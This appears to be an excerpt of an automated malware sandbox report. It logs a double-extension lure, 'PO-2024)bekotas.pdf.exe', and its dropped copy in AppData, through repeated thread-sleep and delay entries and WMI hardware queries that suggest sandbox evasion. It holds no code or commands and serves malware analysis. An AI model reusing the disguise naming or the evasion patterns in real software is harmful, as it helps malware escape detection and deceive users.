                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2396015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395797s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2395031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2394921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2394812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2394703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe TID: 2956Thread sleep time: -2394594s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 2296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 1276Thread sleep count: 4781 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 1276Thread sleep count: 5065 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2399015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398797s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398357s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398247s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398140s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2398031s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397915s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397810s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397590s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397482s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2397047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396719s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396272s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2396047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395719s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395499s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2395000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2394891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2394781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2394672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2394562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2394453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6504Thread sleep time: -2394344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6208Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4424Thread sleep count: 2154 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 4424Thread sleep count: 7666 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399563s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2399110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398245s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2398016s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397891s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397655s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397532s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397420s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397297s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397188s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2397078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396969s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2396110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2395110s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394985s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394860s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394610s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394485s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394360s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394235s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 5276Thread sleep time: -2394110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399875Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399656Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399547Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399437Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399328Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399219Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399109Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2399000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398890Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398781Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398672Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398562Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398453Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398343Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398234Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2398088Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397983Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397875Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397765Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397656Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397547Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397437Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397328Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397219Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397109Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2397000Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396891Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396781Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396672Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396562Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396453Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396344Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396234Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396125Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2396015Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395906Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395797Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395687Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395578Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395469Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395359Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395249Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395140Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2395031Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394921Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394812Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394703Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeThread delayed: delay time: 2394594Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399891Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398357Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398247Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397915Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397810Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397590Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397482Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396828Jump to behavior
